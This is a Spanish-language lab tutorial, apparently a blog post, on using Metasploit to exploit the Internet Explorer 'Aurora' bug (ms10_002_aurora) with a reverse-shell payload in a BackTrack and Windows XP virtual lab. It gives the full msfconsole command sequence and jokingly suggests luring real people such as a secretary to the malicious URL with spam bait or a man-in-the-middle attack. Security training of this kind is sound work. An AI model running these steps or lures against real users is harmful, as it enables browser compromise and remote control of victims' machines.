¿Qué es Metasploit?
Un proyecto open source, dedicado al estudio de la seguridad informática que proporciona información acerca de vulnerabilidades en diferentes sistemas de información y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección de intrusos.
Básicamente es una enorme base de datos, con la mayoría de exploits conocidos hasta la fecha, que permite "cargarlos y dispararlos"
Conceptos básicos:
- Exploit: Fragmento de código encargado de explotar una vulnerabilidad
- Payload: Carga del código.
En un símil armamentístico el exploit sería la pistola y el payload la munición.
¿Qué es Aurora?
Hace un mes, se llevo a cabo un ataque a Google, Adobe y otras grandes compañias del sector en el cual se obtuvo información valiosa de sus clientes, este ataque llamado “Operación Aurora” vulnera una bug del Internet Explorer en todas sus versiones. Aunque a día de hoy este bug ya ha sido parcheado por Microsoft, siguen siendo muchas las compañias y hogares que siguen sin tener actualizado su navegador ya sea por pereza, una mala gestión del administrador o por simple ignorancia.
Paso a Paso:
- Encendemos las dos maquinas virtuales.
- Sobre la maquina virtual de Backtrack nos dirigimos a través del menú del Backtrack (Backtrack > Penetration >Metasploit Exploitation Framework> Framework version 3> Msfconsole) o bien ejecutamos los siguientes comandos:
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
- Como Best Practice es recomendable actualizar la Metasploit antes de utilizarlo ya de este modo estaremos "a la última"
- Empezaremos buscando nuestro exploit, para ello introducieremos el siguiente comando en la consola de Metasploit:
msf > search Aurora
- Una vez encontrado nuestro exploit lo cargamos con el siguiente comando:
msf > use windows/browser/ms10_002_aurora
- Bien ahora que ya tenemos cargado el exploit nos hace falta un Payload, como de Payloads hay un "porron y medio", yo suelo cojer siempre los mismos, un meterpreter o una shell reversa. En este caso cojere la shell reversa que el meterpreter ya se vio por encima con el Autopawn de Fastrack.
Para cargar el Payload que nos devuelva una shell reversa introducimos el siguiente comando en la consola:
msf exploit(ms10_002_aurora)> set PAYLOAD windows/shell/reverse_tcp
- Una vez cargada la "polvora" solo nos queda configurarlo, para ello introduciremos por consola:
Show options
Quenos nomstrará las opciones y parametros a configurar de nuestro ataque.
- Para configurar los diferentes parametros/variables lo haremos, con el comando SET de la siguiente manera:
SET [Nombre de la variable] [Valor de la variable]
Ejemplo:
SET LHOST 192.168.1.132
- Ahora que ya tenemos configurado nuestro ataque solo nos falta una cosa ...... LANZARLO !!
Para ello introduciremos en la consola el siguiente comando:
msf exploit(ms10_002_aurora)> exploit
Como se observa en la imagen anterior ya tenemos nuestro falso "servidor web" montado, ahora solo falta enviarle la URL a "Anita la secretaria" de turno o "Pepito el fontanero" prometiendoles viagras a mitad de precio o rusas buscando jurandoles amor eterno o simplemente haciendo un MiM.
Comandos imprescindibles para el uso de Metasploit:
- Show: Mostrar.
- Search: Buscar.
- Show all: Muestra todos los exploits, payloads, modulos auxiliares, etc .
- Show Exploits: Muestra el listado de Exploits.
- use [Exploit]: Comando para cargar el Exploit.
- Set target [X]: Comando para seleccionar sistema.
- Show Payloads: Muestra el listado de Payloads.
- Set PAYLOAD: Carga el Payload.
- Show options: Muestra el estado y las variables necesarias para realizar el "ataque".
- Set RHOST: Carga del host remoto.
- Set RPORT: Carga del puerto remoto.
- Set LHOST: Carga del host local.
- Set LPORT: Carga del puerto local.
Material necesario para realizar este laboratorio:
- Maquina virtual: Backtrack 4
- Maquina virtual: Windows XP SP3